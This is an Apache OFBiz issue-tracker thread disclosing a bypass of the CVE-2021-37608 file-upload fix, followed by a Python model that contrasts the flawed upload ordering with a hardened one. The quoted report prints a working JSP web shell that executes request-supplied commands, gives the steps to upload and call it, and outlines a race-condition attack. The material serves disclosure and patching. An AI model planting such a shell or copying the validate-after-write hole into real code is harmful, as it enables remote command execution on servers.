[https://issues.apache.org/jira/browse/OFBIZ-12307?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17447424#comment-17447424]
Rohit Koushal edited comment on OFBIZ-12307 at 11/22/21, 2:25 PM:
------------------------------------------------------------------
Hey [~jleroux], I think we missed one place that requires similar changes for
service *addAdditionalViewForProduct* that we did in
[commit|https://github.com/apache/ofbiz-framework/commit/71dbb3c#diff-4dba13f9f119e22bd7bce9650670a2dc6628b22975c1da3972465cc958fad15d].
I have checked and it is failing when uploading Additional images. Below is
the screen for your easy reference over the demo trunk instance.
!image-2021-11-22-18-14-50-370.png|width=469,height=250!
Attaching the patch which will resolve this issue.
[^OFBIZ-12307-addAdditionalViewForProduct.patch]
Thanks!!!
> CVE-2021-37608 vulnerability bypass
> -----------------------------------
>
> Key: OFBIZ-12307
> URL: https://issues.apache.org/jira/browse/OFBIZ-12307
> Project: OFBiz
> Issue Type: Sub-task
> Affects Versions: 17.12.08
> Reporter: thiscodecc
> Assignee: Jacques Le Roux
> Priority: Major
> Labels: security
> Fix For: Release Branch 17.12, 18.12.01
>
> Attachments: OFBIZ-12307-addAdditionalViewForProduct.patch,
> image-2021-11-22-18-14-50-370.png
>
>
> The patch
> ([https://github.com/apache/ofbiz-framework/commit/8d49af4/#diff-75dac0d18a6bc59554dded12b9b01563651e05a2df6cede9d7d3e2b42b7fc382])
> for the CVE-2021-37608 vulnerability can be bypassed.
> Verification process:
> 1. Create a new xx.png.jsp file.
> The content of the xx.png.jsp file is:
> <%
> java.io.InputStream in =
> Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
> int a = -1;
> byte[] b = new byte[2048];
> out.print("<pre>");
> while((a=in.read(b))!=-1)
> { out.println(new String(b)); }
> out.print("</pre>");
> %>
> 2. Upload the xx.png.jsp file directly
> 3. Visit the jsp Trojan address
> "https://localhost:8443/images/products/management/WG-9943/xx.png.jsp?i=whoami"
>
> I carefully analyzed the code of this logic again and found multiple problems.
> The reasons for the vulnerabilities are:
> Here the file is uploaded first.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/applications/product/src/main/java/org/apache/ofbiz/product/imagemanagement/ImageManagementServices.java#L159-#L162]
> When verifying the file name, because the file name is "xx.png.jsp",
> "wrongFile=true".
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L128]
> Because "wrongFile=true", the isValidFile method will exit early.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L137]
> So that the malicious file is not deleted.
>
> [https://github.com/apache/ofbiz-framework/blob/trunk/framework/security/src/main/java/org/apache/ofbiz/security/SecuredUpload.java#L215]
> The above is the reason for the vulnerability mentioned in my last email.
> I also found a new problem. The code logic used to verify the file upload is
> to upload the file first and then delete it after judging that it is
> malicious. This will create a race condition loophole.
> Use multiple threads to upload the xxx.jsp file, and then keep accessing the
> xxx.jsp file. Since OFBiz adopts the verification rule of uploading and then
> deleting, xxx.jsp will be uploaded successfully, and OFBiz has not yet
> successfully deleted "xxx.jsp" when the "xxx.jsp" file is requested by the
> attacker first. This will create an arbitrary file upload vulnerability.
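The two defects the report describes (a name check that returns early without deleting the already-written file, and the upload-then-delete ordering that leaves a window to race) in an added Python model; this is not OFBiz's code. A flawed store is shown beside a hardened one that validates the name before writing, writes only into a quarantine directory outside the web root, checks content there, and atomically renames into place. The allow-list, magic-byte table and sample bytes are constructed for the example.

```python
import os
import re
import tempfile
from pathlib import Path
# Constructed allow-list: extension -> leading magic bytes (not OFBiz's own tables).
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}

def flawed_store(filename, data, webroot):
    """Hypothetical model of the ordering in the report: write under the web root, validate after."""
    target = webroot / filename
    target.write_bytes(data)                     # reachable from this moment on
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext not in MAGIC:
        return None                              # rejected early, but never deleted
    if not data.startswith(MAGIC[ext]):
        target.unlink()                          # the only path that deletes
        return None
    return target

def safe_name(filename):
    """Name policy checked before any byte is written: bare name, exactly one allow-listed extension."""
    if Path(filename).name != filename:
        return False
    stem, _, ext = filename.lower().partition(".")
    return bool(re.fullmatch(r"[a-z0-9_-]+", stem)) and ext in MAGIC

def hardened_store(filename, data, quarantine, webroot):
    """Check the name, write to quarantine outside the web root, check content, then atomic rename."""
    if not safe_name(filename):
        return None
    fd, tmp = tempfile.mkstemp(dir=quarantine)
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
        if not data.startswith(MAGIC[filename.lower().partition(".")[2]]):
            return None                          # rejected without ever touching the web root
        final = webroot / filename
        os.replace(tmp, final)                   # atomic: the web root only ever sees a validated file
        return final
    finally:
        Path(tmp).unlink(missing_ok=True)

def demo():
    web, quar = Path(tempfile.mkdtemp()), Path(tempfile.mkdtemp())   # throwaway dirs
    png, not_png = MAGIC["png"] + b"\0" * 16, b"<% %>"              # constructed sample bytes
    flawed_store("xx.png.jsp", not_png, web)
    return {"flawed_leaves_file": (web / "xx.png.jsp").exists(),
            "good_png": hardened_store("xx.png", png, quar, web) is not None,
            "double_ext": hardened_store("xx.png.jsp", not_png, quar, web) is None,
            "wrong_content": hardened_store("fake.png", not_png, quar, web) is None}
```

`demo()` shows the flawed store leaving `xx.png.jsp` on disk after rejecting it, while the hardened store rejects the same name and mismatched content without the web root ever seeing either file.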